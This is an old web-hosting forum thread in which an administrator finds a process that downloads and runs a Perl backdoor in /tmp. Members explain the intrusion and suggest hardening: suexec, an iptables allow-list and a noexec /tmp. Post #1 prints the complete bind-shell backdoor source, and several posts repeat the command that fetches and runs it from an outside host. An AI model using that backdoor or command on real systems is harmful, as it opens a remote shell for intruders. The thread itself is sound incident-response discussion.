  1. #1
    Registered User
    Join Date
    Apr 2003
    Posts
    41

    Default hacked ???? www.uhagr.org

    While looking over some things on a server I came across this line....


    nobody 32749 0.0 0.0 2100 972 ? S Apr17 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001


    I went to that URL and found:

    #!/usr/bin/perl

    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################


    use IO::Socket;


    $msg = "echo ::[UHAGr] Yeah! ::-";
    $port = ($ARGV[0]);
    $shell = "/bin/sh";

    if (!$port) { $port="75000"; }

    $local = IO::Socket::INET->new(Proto=>"tcp", LocalPort=>"$port",
    Listen=>"1") or die "Port allready in use \n";

    print "
    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################
    ";



    while (accept(remote, $local)) {

    open(STDIN, ">&remote");
    open(STDOUT, ">&remote");
    open(STDERR, ">kick");

    system($msg);
    system($shell);

    close(STDERR);
    close(STDIN);
    close(STDOUT);
    system("rm kick");

    }


    At http://www.uhagr.org/ I found some tools to exploit servers etc...

    I do think we have some kind of backdoor open on this server. I'm no expert at all, so that is the reason I come and ask here what it does, what a sysadmin could do to close this, and where to find the file or how to find it....
    My feeling is that it is used to open a relay to spam, personal opinion....
    Or am I completely wrong ???

    Thanks a lot for your help in this matter.

  2. #2
    Member
    Join Date
    Feb 2004
    Posts
    20

    Default

    This will get that perl script and launch it. That will provide the hacker with a shell on port 2001, as it seems from the command launched.

  3. #3
    Member
    Join Date
    Sep 2003
    Location
    indonesia
    Posts
    33

    Default

    Originally posted by noc32
    This will get that perl script and launch it. That will provide the hacker with a shell on port 2001, as it seems from the command launched.
    Hi Noc32
    How do you clean your server after that?

  4. #4
    Member
    Join Date
    Feb 2004
    Posts
    20

    Default

    How do you clean the server? Good question indeed... because what was presented here is just a backdoor to the system, and God knows what that hacker brought to the system. The system will have to be scanned for:
    - rootkits
    - other backdoors
    - modified binaries (like ps, ls...)

    If you're not used to this it's advised to hire a professional to do it, or you could always make a full backup and do an OS restore.

  5. #5
    Registered User
    Join Date
    Apr 2003
    Posts
    41

    Default

    We ran a rootkit and it showed nothing really special.

    We have a firewall, and except for the standard ports needed to run normal services all is closed. We monitor the iptables log and nope, no trace of any traffic nor intrusion (better: break-out try).

    I killed the services that led me to this and they didn't restart even after a reboot.....

    That is the reason we find it hard to trace. We keep a close watch on the server.... hope we can trace it one day.....

    No unusual traffic....

  6. #6
    cPanel Partner NOC cPanel Partner NOC Badge
    Join Date
    Mar 2003
    Location
    NC
    Posts
    725
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    I played around with that for a while and it seems like, the way it was started and all, it was just a temporary shell. Now, though, he might have been able to hack your server, but it looks like you stayed safe. Once loaded he would have tried to access it, but your firewall blocked port 2001, which is what saved you I think.

    Still keep a close eye on it, but looks like you should be fine.

  7. #7
    Member
    Join Date
    Nov 2003
    Posts
    521

    Default

    Where did you find that line?

    Is there any way to report that user to Yahoo?
    Last edited by damainman; 04-22-2004 at 04:54 PM.

  8. #8
    cPanel Partner NOC cPanel Partner NOC Badge
    Join Date
    Mar 2003
    Location
    NC
    Posts
    725
    cPanel/Enkompass Access Level

    Root Administrator

    Default

    The line was in ps -aux, or at least it could be seen there. All ISPs have an abuse department; just look on their main website or do a whois on the domain.

  9. #9
    Registered User
    Join Date
    Apr 2003
    Posts
    41

    Default

    I have a little file on a small account that I can call via the browser with

    #!/usr/bin/perl
    # CGI script: it runs as the web server user, so the commands below
    # report what that user can see of the system.
    print "Content-type: text/html\n\n";
    print "<html><h1>System Report</h1></html>\n";
    print "<br>\n<br>\n<br>\n";
    print "System UPTIME response : ";
    print `uptime`;
    print "\n<br>System UNAME response : ";
    print `uname -a`;
    print "\n<br>System WHO response : ";
    print `who`;
    print "\n<br>System ps -auwx response : <pre>\n";
    print `ps -auwx`;
    print "\n</pre>";

    It gives you general info on the server and you see a lot in there.

    This is how I saw these lines:

    nobody 4442 0.0 0.0 5052 476 ? S 19:24 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001
    nobody 4444 0.0 0.1 6824 1324 ? S 19:24 0:00 perl bd.txt 2001


    And it came back. Trying to dig again, I found 3 bd.txt in /tmp this time. I didn't kill anything yet since the ports are closed, but I am trying to find out now where they come from; there must be something creating these files. In the file you see the script from post one, which you can also see on the site.

    Wondering if there is something else I should delete or not.......

  10. #10
    Member
    Join Date
    Feb 2004
    Posts
    20

    Default

    You should look into rc.local or rc.sysinit for this line:

    sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001

    Maybe that's where it's launched. Or it may be a cronjob.

  11. #11
    Member
    Join Date
    Dec 2003
    Posts
    28

    Default

    You should really secure your tmp directory.

    Put /tmp and /var/tmp into a separate partition and then make it non-executable.

  12. #12
    Member
    Join Date
    Nov 2003
    Posts
    34

    Default

    Just because /tmp or /var/tmp is not executable doesn't mean you cannot execute perl scripts or the like.

    perl /tmp/bleh.pl

    will still work.
    Why?
    Because perl is actually doing the executing, and it is only parsing /tmp/bleh.pl.

    At any rate.
    You need to install phpsuexec and suexec.

    Someone did PHP injection on one of your customers' sites.
    Now, because you do not have phpsuexec installed, you cannot tell who actually has the vulnerable software.
    And you now probably have someone logging into your server as nobody, which is really bad.
    If you run phpsuexec, then if they do get a backdoor they are only going to be the user of that site.
    Then you can look at the files in /tmp and see the user.
    Look for his domain and then check /usr/local/apache/domlogs.
    Then look through their domain log file and you can see what was actually called and how they did it.
    I also recommend running iptables.
    Block everything inbound and only allow certain ports:
    80, 21, 22, 53, 443, 2086, etc. etc.
    Then that backdoor won't work, because you did not specify in the iptables rules that port 2001 is allowed inbound traffic.

    You should really mount /tmp as a separate partition, however.
    It turns away some people by not letting them execute from it.
    Most people use perl now for backdoors because everyone has perl installed.

    Also you should check /dev/shm <-- new tmp for glibc2.
    You can umount that; it isn't needed.
    umount /dev/shm, and you probably want to add that to a startup file so it unmounts it at every boot.

    Before you do that, ls -la /dev/shm
    and make sure no one already put files in it to hack you.

    Once you get /tmp mounted as a separate partition:
    stop mysql
    rm -rf /var/tmp
    ln -s /tmp /var/tmp
    Then you also keep /var/tmp from being executable.

    Hope this helps :P
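    Added example, not code from any post in this thread: r00t316's two hardening steps, an inbound allow-list in iptables and /tmp on its own partition, written so you can check them before touching the live box. The port list is the one from the post; the rule order (allow-list first, DROP policy last) and the check that /tmp carries noexec, nosuid and nodev are my assumptions. Nothing is applied: the rules are only printed for review, and the mount check reads a /proc/mounts-style table you pass in (two constructed ones below).

```shell
#!/bin/sh
# Added example, not code from any post in this thread.
#  build_input_rules     - print an inbound allow-list iptables script
#  tmp_mount_is_hardened - check a /proc/mounts-style table for a hardened /tmp
# Sample mount tables are constructed.

# build_input_rules "80 21 22 53 443 2086": allow loopback and replies to
# connections the server itself opened, allow NEW connections only on the
# listed TCP ports (plus UDP 53 for DNS), and set the default policies last,
# so running this over ssh does not drop the session before port 22 is in.
# Anything not listed, such as the backdoor's port 2001, is never reachable.
build_input_rules() {
    echo 'iptables -F INPUT'
    echo 'iptables -A INPUT -i lo -j ACCEPT'
    echo 'iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    for p in $1; do
        echo "iptables -A INPUT -p tcp --dport $p -m state --state NEW -j ACCEPT"
    done
    echo 'iptables -A INPUT -p udp --dport 53 -j ACCEPT'
    echo 'iptables -P FORWARD DROP'
    echo 'iptables -P INPUT DROP'
    return 0
}

# tmp_mount_is_hardened TABLE: TABLE is the text of /proc/mounts; returns 0
# only if /tmp is its own mount point and its options include all three of
# noexec, nosuid and nodev. (As the post says, noexec still does not stop
# "perl /tmp/x.pl"; it only removes direct execution from the directory.)
tmp_mount_is_hardened() {
    opts=$(printf '%s\n' "$1" | awk '$2 == "/tmp" { print $4; exit }')
    [ -n "$opts" ] || return 1          # no entry: /tmp is just a directory on /
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Constructed mount tables. The first comes from an fstab line such as
# "/dev/sda3 /tmp ext3 defaults,nosuid,nodev,noexec 0 2" (device name assumed);
# in the second, /tmp still lives on the root filesystem.
MOUNTS_HARDENED='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,noexec 0 0'
MOUNTS_WEAK='/dev/sda1 / ext3 rw 0 0
tmpfs /dev/shm tmpfs rw 0 0'

# Demo: print the rule script, then report on both tables.
build_input_rules "80 21 22 53 443 2086"
if tmp_mount_is_hardened "$MOUNTS_HARDENED"; then echo "table 1: /tmp hardened"; fi
if tmp_mount_is_hardened "$MOUNTS_WEAK"; then :; else echo "table 2: /tmp NOT hardened"; fi
```

    To use the mount check on a real system, pass it `"$(cat /proc/mounts)"`. The rule script is worth reading line by line before running it as root, and the last two lines are the ones that lock the box down, which is why they are emitted after every ACCEPT rule. Note that this inbound filter is exactly what post #6 credits with saving the server: the download of bd.txt still happened, only the shell on port 2001 was unreachable.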

  13. #13
    Member bmcpanel's Avatar
    Join Date
    Jun 2002
    Posts
    546

    Default

    Quote Originally Posted by r00t316
    You should really mount /tmp as a separate partition, however.
    It turns away some people by not letting them execute from it.
    You are right. Securing /tmp is not fool-proof, but it will deter some would-be hackers that would otherwise hack your box.
